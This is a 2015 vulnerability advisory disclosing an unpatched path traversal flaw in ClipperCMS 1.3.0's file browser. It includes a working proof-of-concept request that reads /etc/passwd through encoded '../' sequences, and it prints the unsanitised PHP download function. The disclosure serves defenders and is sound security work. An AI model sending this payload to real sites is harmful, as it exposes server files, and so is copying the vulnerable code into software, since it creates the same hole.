ClipperCMS 1.3.0: Path Traversal
Date: 2015-11-13 11:41:021. Introduction
| Affected Product: | ClipperCMS 1.3.0 |
| Fixed in: | not fixed |
| Fixed Version Link: | n/a |
| Vendor Website: | http://www.clippercms.com/ |
| Vulnerability Type: | Path Traversal |
| Remote Exploitable: | Yes |
| Reported to vendor: | 10/02/2015 |
| Disclosed to public: | 11/13/2015 |
| Release mode: | Full Disclosure |
| CVE: | n/a |
| Credits | Tim Coen of Curesec GmbH |
2. Vulnerability Description
CVSS
Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
Description
The "file" Parameter of the file browser is vulnerable to directory traversal, allowing the download of arbitrary files.
A user account is needed with at least the lowest default role, which is "Editor".
3. Proof of Concept
POST /ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1
dir=images&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4. Code
/ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/core/browser.php
protected function act_download() {
$dir = $this->postDir();
if (!isset($this->post['dir']) ||
!isset($this->post['file']) ||
(false === ($file = "$dir/{$this->post['file']}")) ||
!file_exists($file) || !is_readable($file)
)
$this->errorMsg("Unknown error.");
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private", false);
header("Content-Type: application/octet-stream");
header('Content-Disposition: attachment; filename="' . str_replace('"', "_", $this->post['file']) . '"');
header("Content-Transfer-Encoding: binary");
header("Content-Length: " . filesize($file));
readfile($file);
die;
}
5. Solution
This issue has not been fixed by the vendor.
6. Report Timeline
| 10/02/2015 | Informed Vendor about Issue (no reply) |
| 10/21/2015 | Reminded Vendor of Disclosure Date (no reply) |
| 11/13/2015 | Disclosed to public |